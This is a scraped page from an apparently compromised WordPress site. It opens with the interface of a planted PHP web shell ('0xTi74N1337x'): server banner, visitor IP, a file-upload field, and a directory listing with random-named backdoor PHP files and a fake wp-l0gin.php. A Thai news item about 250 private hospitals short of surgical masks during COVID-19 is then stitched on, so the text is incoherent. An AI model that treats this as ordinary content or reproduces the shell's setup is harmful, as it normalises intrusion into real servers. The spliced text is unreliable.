0xTi74N1337x
Linux server1.buriramguru.com 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64Your IP : 34.239.152.207


Current Path : /home/buriram1/domains/buriramguru.com/public_html/
Upload File :

Name
Size
Permissions
Options
.quarantine
--
drwxr-xr-x
.tmb
--
drwxr-xr-x
.well-known
--
drwxr-xr-x
ad
--
drwxr-xr-x
avatars
--
drwxr-xr-x
cgi-bin
--
drwxr-xr-x
css
--
drwxr-xr-x
forum.hold
--
drwxr-xr-x
images
--
drwxr-xr-x
meta
--
drwxr-xr-x
suppercachburiram
--
drwxr-xr-x
suppercachburiramlive
--
drwxr-xr-x
test
--
drwxr-xr-x
well-known
--
drwxr-xr-x
wp-admin
--
drwxr-xr-x
wp-content
--
drwxr-xr-x
wp-includes
--
drwxr-xr-x
.htaccess
0.194 KB
-rw-r--r--
admin.php
149.093 KB
-rw-r--r--
index.php
3.409 KB
-rw-r--r--
index1.php
0.413 KB
-rw-r--r--
juwiifwj.php
192.749 KB
-rw-r--r--
license.txt
19.073 KB
-rw-r--r--
logo.gif
3.27 MB
-rw-r--r--
oldindex.php
149.093 KB
-rw-r--r--
readme.html
7.282 KB
-rw-r--r--
robots.txt
0.082 KB
-rw-r--r--
ublmchdh.php
25.034 KB
-rw-r--r--
versions.php
0.091 KB
-rw-r--r--
wp-activate.php
7.105 KB
-rw-r--r--
wp-blog-header.php
0.412 KB
-rw-r--r--
wp-comments-post.php
2.353 KB
-rw-r--r--
wp-config-sample.php
2.837 KB
-rw-r--r--
wp-config.php
3.955 KB
-rw-------
wp-cron.php
5.482 KB
-rw-r--r--
wp-l0gin.php
7.984 KB
-rw-r--r--
wp-links-opml.php
2.502 KB
-rw-r--r--
wp-load.php
3.892 KB
-rw-r--r--
wp-login.php
48.267 KB
-rw-r--r--
wp-mail.php
8.392 KB
-rw-r--r--
wp-settings.php
24.011 KB
-rw-r--r--
wp-signup.php
33.614 KB
-rw-r--r--
wp-trackback.php
4.868 KB
-rw-r--r--
xmlrpc.php
3.229 KB
-rw-r--r--
zzvfeyyb.php
25.034 KB
-rw-r--r--

วิกฤติ! 250 รพ.ขาดหน้ากากอนามัย ‘คนไข้-หมอ-เจ้าหน้าที่’ เสี่ยงเชื้อโควิด-19 – บุรีรัมย์กูรู เว็บอันดับหนึ่ง ข้อมูลท่องเที่ยวจังหวัดบุรีรัมย์

วิกฤติ! 250 รพ.ขาดหน้ากากอนามัย ‘คนไข้-หมอ-เจ้าหน้าที่’ เสี่ยงเชื้อโควิด-19

0

 วันที่ 1 มีนาคม 2563 มีการเปิดเผยหนังสือของ สมาคมโรงพยาบาลเอกชน ลงวันที่ 27 กุมภาพันธ์ 2563 ถึง นายอนุทิน ชาญวีรกูล รองนายกรัฐมนตรีและรัฐมนตรีว่าการกระทรวงสาธารณสุข เรื่อง โรงพยาบาลเอกชนประสบปัญหาขาดแคลนหน้ากากอนามัยสำหรับใช้ป้องกันการระบาดของโรคโควิด-19 ในขั้นวิกฤต โดยมีเนื้อหา ดังนี้

            เนื่องจากการระบาดของโรคอุบัติใหม่ โรคติดต่อเชื้อไวรัสโคโรนา สายพันธุ์ใหม่ (โควิด-19) ทางกระทรวงสาธารณสุข (สธ.) ได้ให้โรงพยาบาลเอกชนทุกแห่งเตรียมการรับสถานการณ์ที่อาจจะมีการระบาดในวงกว้างขึ้น โรงพยาบาลเอกชนมีการรับคนไข้ที่มีความเสี่ยงมากกว่าร้อยละ 70 ในโรงพยาบาล
            แต่ปัจจุบันโรงพยาบาลเอกชนประสบปัญหาขาดแคลนหน้ากากอนามัยเข้าขั้นวิกฤต และโรงพยาบาลเอกชนบางแห่งไม่มีหน้ากากอนามัยใช้แล้ว บุคลากรทางการแพทย์ต้องใช้หน้ากากผ้าซึ่งมีความเสี่ยงมาก ทางโรงพยาบาลเอกชนทุกแห่งไม่สามารถจัดซื้อจัดหาหน้ากากอนามัยได้ เพราะกรมการค้าภายในได้ประกาศให้หน้ากากอนามัยเป็นสินค้าควบคุม และโรงงานผู้ผลิตต้องจัดส่งให้กับกรมการค้าภายในเท่านั้น ไม่สามารถจำหน่ายให้โรงพยาบาลเอกชนได้ โรงพยาบาลเอกชนได้ติดต่อขอซื้อหน้ากากอนามัยจากกรมการค้าภายใน แต่ได้รับคำตอบว่าให้แจ้งเข้าไปเพื่อเข้าระบบการรอคิว

            หนังสือดังกล่าวระบุด้วยว่า หากไม่มีหน้ากากอนามัยให้กับบุคลากรทางการแพทย์และคนไข้ที่มีความเสี่ยงในการติดโรคในโรงพยาบาลเอกชน อาจเกิดผลกระทบต่อประชาชนในวงกว้างและร้ายแรงมากขึ้น และจะไม่สามารถควบคุมการระบาดของโรคได้

            สมาคมโรงพยาบาลเอกชนในฐานะผู้แทนของโรงพยาบาลเอกชนจำนวน 250 แห่งทั่วประเทศ จึงได้ทำการสำรวจจำนวนหน้ากากอนามัยขั้นต่ำที่ต้องการใช้ในแต่ละวัน และขอความอนุเคราะห์ได้โปรดจัดสรรหน้ากากอนามัยให้กับโรงพยาบาลเอกชน เพื่อที่โรงพยาบาลเอกชนจะสามารถควบคุมป้องกันไม่ให้มีการระบาดมากกว่านี้ หรือให้โรงพยาบาลเอกชนสามารถจัดซื้อจัดหาจากที่ใดเพื่อให้มีใช้ได้ โดยประสานงานกับทางสมาคม เพื่อให้ปันส่วนให้โรงพยาบาลเอกชนได้เท่ากันอย่างเพียงพอ

หน้ากากอนามัย

ภาพจาก hfocus.org

อ่านรายละเอียดเพิ่มเติมจากhfocus.org